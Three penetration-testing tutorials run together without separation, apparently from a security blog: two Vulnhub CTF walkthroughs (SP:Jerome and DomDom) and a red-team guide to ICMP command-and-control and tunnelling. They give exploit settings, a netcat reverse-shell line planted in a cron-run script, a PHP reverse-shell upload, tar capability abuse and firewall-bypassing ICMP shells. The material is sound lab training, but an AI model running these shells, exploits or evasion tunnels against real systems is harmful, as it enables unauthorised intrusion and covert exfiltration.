SP:Jerome Vulnhub Walkthrough

Today we are going to take another CTF challenge from the series of SP:Jerome. The credit for making this VM machine goes to “Daniel Solstad” and it’s a boot2root challenge where we have to root the server and capture the flag to complete the challenge. You can download this VM here.

Security Level: Intermediate

Penetrating Methodology:

1.      Scanning

·         Netdiscover

·         NMAP

2.      Enumeration

·         Dirbuster

·         WPScan

3.      Exploitation

·         Metasploit

4.      Privilege Escalation

·         Exploiting Crontab

Walkthrough:

Scanning:

Let’s start of by scanning the network and identifying host IP address. We can identify our host IP as 192.168.1.104 by using Netdiscover.

netdiscover

We used Nmap for port enumeration and found that only port 8080 is open on which a squid proxy is running, which means our target machine is behind a proxy server.

nmap  –A 192.168.1.104

Enumeration:

Since the target machine was behind the proxy so we may not get desired results from any direct enumeration technique. We tried using dirb with proxy for directory brute forcing but didn’t get anything. Then we tried Dirbuster with proxy and got one directory named called /server-status.

To setup proxy in Dirbuster go to Advance options then click on Http Options and check the Run through a Proxy box and enter the host ip and port number.

So to access the url 127.0.0.1/server-status in the browser we first set up our proxy using the foxyproxy or directly in the settings of the browser.

We have done here using the foxyproxy plugin.

Then we accessed the url and found that there is one more port open on the target machine i.e 1337.

After accessing the url 127.0.0.1:1337 we couldn’t find anything there.

So we again used Dirbuster for brute force and got a directory named /wordpress.

After accessing the url we got a wordpress site.

So we used WPScan with proxy to find any vulnerability on the just found wordpress site.

wpscan--url http://127.0.0.1:1337/wordpress --proxy http://192.168.1.104:8080 -e u

In the results of the san we found that the site has two wp admins root & Jerome.

Also we got to know that there is a code execution vulnerability present in the website for which the exploit is already present in the metasploit.

Exploitation:

We used the same exploit in msf which was given by our WPScan results.

Since this was an authenticated code execution exploit which means we have to enter the credentials, we put in the jerome jerome as username and password and it came out to be correct and we got a meterpreter shell.

use exploit/multi/http/wp_crop_race

set rhosts 127.0.0.1

set proxies http://192.168.1.104:8080

set username jerome

set password jerome

set targeturi /wordpress

set rport 1337

set ReverseAllowProxy true

set lhost 192.168.1.105

exploit

We looked into the /home/Jerome directory and got our first flag.

Now it was time to get to the root shell and get out final flag. We looked here and there to get something useful and in the process we checked into the crontab file and found that there is one script simulate.sh scheduled after every reboot.

The simulate.sh file is tasked to run three commands cd, ls and sleep.

cd /jerome

cat flag.txt

cat /etc/crontab

cat /usr/share/simulate.sh

Privilege Escalation:

To elevate to the root shell what we did is we edited the ls file using the echo command in which we have written the netcat export bash shell one liner which actually exports the bash shell of the victim machine to the listener machine.

shell

python -c 'import pty; pty.spawn("/bin/sh")'

echo “nc –e /bin/bash 192.168.1.104 1234 “ >> ls

chmod 777 ls

On our kali we started the nc listener on the same port and after rebooting the target system we got the root shell and finally the root flag.

nc –lvp 1234

id

cat flag.txt

Command and Control & Tunnelling via ICMP

In this article, you will learn about RED TEAM Operation for data exfiltration via ICMP-C2 and ICMP Tunneling because both approaches are useful in order to circumvent firewall rules because they generate unsound traffic in the network.

Table of Content

Brief Summary of working ICMP Protocol

Command & Control via ICMP Protocol

·         Requirement

·         icmpsh: C2-channel & Its Installation

·         Run icmpsh as Master

·         Run icmpsh as Slave

ICMP Tunneling

·         Requirement

·         Configure ICMP over Server Machine (Target)

·         Configure ICMP tunnel over Client Machine (Intruder)

·         Connect SSH Over ICMP

Brief Summary of working ICMP Protocol

 The Internet Control Message Protocol (ICMP) is a supporting protocol in the Internet protocol suite. It is used by network devices, including routers, to send error messages and operational information which indicates that a requested service is not available or that a host or router could not be reached.

It is layer 3 i.e. network layer protocol used by the ping command for sending a message through ICMP payload which is encapsulated with IP Header Packet.  According to MTU the size of the ICMP packet cannot be greater than 1500 bytes.

ICMP packet at Network layer

IP header	ICMP header	ICMP payload size	MTU (1500)
20 bytes	8 bytes	1472 bytes  (maximum)	20 + 8 + 1472 = 1500

A ping command sends an ICMP echo request to the target host. The target host responds with an echo Reply which means the target host is alive.

Read more from here

Command & Control via ICMP Protocol

In our many publication we had discussed over C2-channel who is additionally acknowledged as command & control so you may find out it here. Although you are pleased to learn how to use ICMP protocol as a command & control channel between this thesis.

A cyber-war is strolling of Intruder and Security researcher therefore we need to usually hold partial backup plan. As we whole know the company has grown to be smarter, they understand such as type concerning attack are being observed after achieving TCP reverse connection of the machine.

Thus we come up with ICMP secert shell which and use icmpsh as command & control tool.

REQUIREMENT

·         Attacker Machine or C2-channel:192.168.1.108 (Kali Linux)

·         Host machine:192.168.1.106 (Windows 10)

icmpsh: C2-channel & Its Installation

icmpsh is a simple reverse ICMP shell with a win32 slave and a POSIX compatible master in C, Perl or Python. The main advantage over the other similar open source tools is that it does not require administrative privileges to run onto the target machine.

The tool is clean, easy and portable. The slave (client) runs on the target Windows machine, it is written in C and works on Windows only whereas the master (server) can run on any platform on the attacker machine as it has been implemented in C and Perl by Nico Leidecker and later it also get ported into Python too.

It very easy to install and use as c2-channel. Turn the attacker machine for icmpsh and download icmpsh from github.

git clone https://github.com/inquisb/icmpsh.git

Run icmpsh as Master

Once the downloads have been completed, you can use the following command to run the master. The most important step before taking action is to disable ping reply on your machine. This prevents the kernel from responding to ping packets itself.

sysctl -w net.ipv4.icmp_echo_ignore_all=1

cd icmpsh

syntax: ./icmpsh_m.py

./icmpsh_m.py 192.168.1.108 192.168.1.106

Run icmpsh as slave

Now again install icmpsh inside the host machine for running slave and the user running the slave on the target system does not require administrative privileges. And then run the following command within cmd.

./icmpsh.exe -t 192.168.1.108

Once the above command is executed on the host machine, the intrude will have the machine running as a slave's reverse shell. You can observe from the image below that the machine controls the slave machine by spawning its prompt of command.

Now as we said that with the help ping, icmpsh will get the host machine's reverse shell over the icmp channel. Therefore, I simply trigger a command and use wireshark to capture its packet to ensure the backend process.

Great!! This works exactly as we assumed and the data is transmitted on a network layer with the help of PING request/reply packets, so no service or port is required, and the traffic is undetected by proxy-based firewalls and may bypass firewall rules.

ICMP Tunneling

ICMP tunnel is an approach that works by tunneling TCP connections over ICMP packets. Here you will we access ssh session that will be encapsulated by ICMP packets. Hence again a tcp connection will be establish at layer 3 i.e. network layer which will be encapsulated as icmp payload and this could be helpful to bypass firewall rule.

REQUIREMENT

Server Machine

·         ens33:192.168.1.108

·         tun0:10.0.0.1

Client Machine

·         eth0: 192.168.1.111

·         tun0:10.0.0.2

icmptunnel is a tool to tunnel IP traffic within ICMP echo request and response (ping) packets. It’s intended for bypassing firewalls in a semi-covert way, for example when pivoting inside a network where ping is allowed. It might also be useful for egress from a corporate network to the Internet, although it is quite common for ICMP echo traffic to be filtered at the network perimeter.

While there are a couple of existing tools which implement this technique, icmptunnel provides a more reliable protocol and a mechanism for tunneling through stateful firewalls and NAT.

Configure ICMP over Server Machine (Target)

Download and install icmptunnel on the host machine and compile the file as followed in image given below

git clone https://github.com/jamesbarlow/icmptunnel.git

cd icmptunnel

make

First, disable ICMP echo reply on both the client and server. This foils the kernel from responding to ping packets itself.

echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all

On the server-side (host machine), start icmptunnel in server mode, and assign an IP address to the new tunnel interface.

./icmptunnel -s

Ctrlz

bg

/sbin/ifconfig tun0 10.0.0.1 netmask 255.255.255.0

ifconfig

Configure ICMP tunnel over Client Machine (Intruder)

Similarly repeat the same process over intruder machine to install icmptunnel for peer to peer connection.

git clone https://github.com/jamesbarlow/icmptunnel.git

First compile it and then disable ICMP echo reply to avoid kernel from responding to ping packets itself.

cd icmptunnel

make

echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all

./icmptunnel 192.168.1.108

ctrl z

/sbin/ifconfig tun0 10.0.0.2 netmask 255.255.255.0

Connect SSH Over ICMP

You should have a point-to-point tunnel at this point through ICMP packets. There is 10.0.0.1 on the server side and 10.0.0.2 on the client side. Try to connect to the server via SSH a tcp protocol on the client:

ssh raj@10.0.0.1

The icmp tunnel is connected between server and client at the initial phase, which could be seen in the following image where we captured the traffic flowing between server and client with the help of wireshark.

Every traffic is ICMP. The packet HTTP / IP can be regarded as part of the ICMP payload. The HTTP/IP packets are accelerated to the internet. Notice in what way the source IP has been impersonated because of nat. Thus, the traffic will not goes on transport layer for connecting SSH via port 22.

DomDom: 1 Vulnhub Walkthrough

DomDom is another CTF challenge based on PHP mis-functionality and credit goes to Avraham Cohen for designing this VM. Here you need to identify bug to get reverse shell connection of the machine and try to access root shell. This VM can be downloaded from given below link and its level is set to easy for beginners.

Let’s start off with the scanning process. This target VM took the IP address of 192.168.1.103 automatically from our local Wi-Fi network.

Then we used Nmap for port enumeration. We found that port 80 is open for running http services.

Taking our manual penetrating approach ahead we navigate to web browser and explore VM IP in the URL filed. It welcomed us with a login form as shown below in the image.

So, we just simply type following and then click on execute tab:

Your Name: admin

Your Username: admin

Password: admin

Since we didn’t find any clue to step ahead therefore, we choose dirb for web directory enumeration. So, when I execute below command, I found two URL with 200 OK code.

dirb http://192.168.1.102

So when we had explored /admin.php it gave me us a hint to dig more to identify the action being used here.

So again I explore http://192.168.1.102 and intercept its data with in burp suite and then send the intercepted data into repeater to identify what action is being execute.

So, I forward the intercepted data into responder and at initial phase it captures the POST request for /index.php but inside responder we have changed the Post request from /index.php to /admin.php to identify the action.

Wow!! From its response we found an in-built script which is executing command.

To ensure the backend functionality, we try to send request to execute “id” command and obtain desired result as expected hence it is confirm that it vulnerable to Remote Code Execution.

Hence, I found the path where once can execute the malicious code or inject the malicious file inside the host machine to get the reverse connection machine.

Therefore, I grabbed a malicious file “php-reverse-shell” from inside /usr/share/webshells/php and modify the listening i.e. Kali Linux IP and named it shell.php.

Further I try to inject our shell.php file inside the host machine and gave full permission to the malicious php file as shown in the image given below, further launch netcat listener in a new terminal to get reverse connection.

Now, once the file gets uploads successfully, we need to execute malicious file as highlighted below.

As soon as you will execute the malicious file you get reverse shell through netcat. So, as you can observe that we have netcat session thus now we can step ahead for privilege escalation.

At this point, I was not sure what should be done to extract hidden flag, therefore, I thought to identify the binary capability files with the help of getcap and saw the fruitful result.

getcap -r / 2>/dev/null

On exploring further we found README.md from  inside /home/domom/Desktop which is owned by root.

As we have seen in the above image that “/bin/tar” has the capabilities to compress the file. It can manipulate its process UID and can be used on Linux as a backdoor to maintain elevated privileges with the CAP_SETUID capability set therefore I trigger the following command which will generate the .tar README.md inside /tmp directory

cd /tmp

tar -cvf readme.tar /home/domom/Desktop/README.md

when you will execute the above command, it will generate readme.tar file inside /tmp directory which could be extracted further to read README.md file.

tar -xvf readme.tar

cat tar /home/domom/Desktop/README.md

Great!! From inside this file we have obtained the password for user “root” thus switch into root account with the help of password found and access the root shell.

su root